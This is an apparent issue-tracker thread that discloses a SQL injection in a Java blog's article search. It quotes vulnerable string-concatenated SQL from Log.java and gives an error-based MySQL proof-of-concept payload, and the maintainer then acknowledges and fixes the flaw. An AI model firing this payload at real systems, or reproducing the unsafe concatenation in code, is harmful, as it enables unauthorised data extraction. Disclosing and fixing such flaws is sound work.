There is a sql injection in the article search box

[1f3lse]

Log.java

String sql = "select l.*,l.privacy privacy,t.typeName,l.logId as id,l.last_update_date as lastUpdateDate,t.alias as typeAlias,u.userName,(select count(commentId) from " + Comment.TABLE_NAME + " where logId=l.logId ) commentSize from " + TABLE_NAME + " l inner join user u inner join type t where u.userId=l.userId" + searchKeywords + " and t.typeid=l.typeid order by " + pageSort + " limit ?,?";
        data.put("rows", findEntry(sql, ParseUtil.getFirstRecord(page, pageSize), pageSize));
        ModelUtil.fillPageData(this, page, pageSize, "from " + TABLE_NAME + " l inner join user u where u.userId=l.userId " + searchKeywords, data, new Object[]{});
        return data;

TABLE_NAME Field not verified

[1f3lse]

Poc
keywords=aaaa') AND (SELECT 8405 FROM(SELECT COUNT(*),CONCAT(0x71706a6271,(SELECT (ELT(8405=8405,1))),0x7176787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('VybC'='VybC&_search=false&nd=1537172851162&rows=10&page=1&sidx=&sord=asc

[94fzb]

@3lse Thanks this sql injection need admin login, so not worry, I fix this bug in recent days, And this sql injection just work on query statement.

[attritionorg]

@94fzb can you link to the fixing commit please?

[attritionorg]

Thank you @94fzb!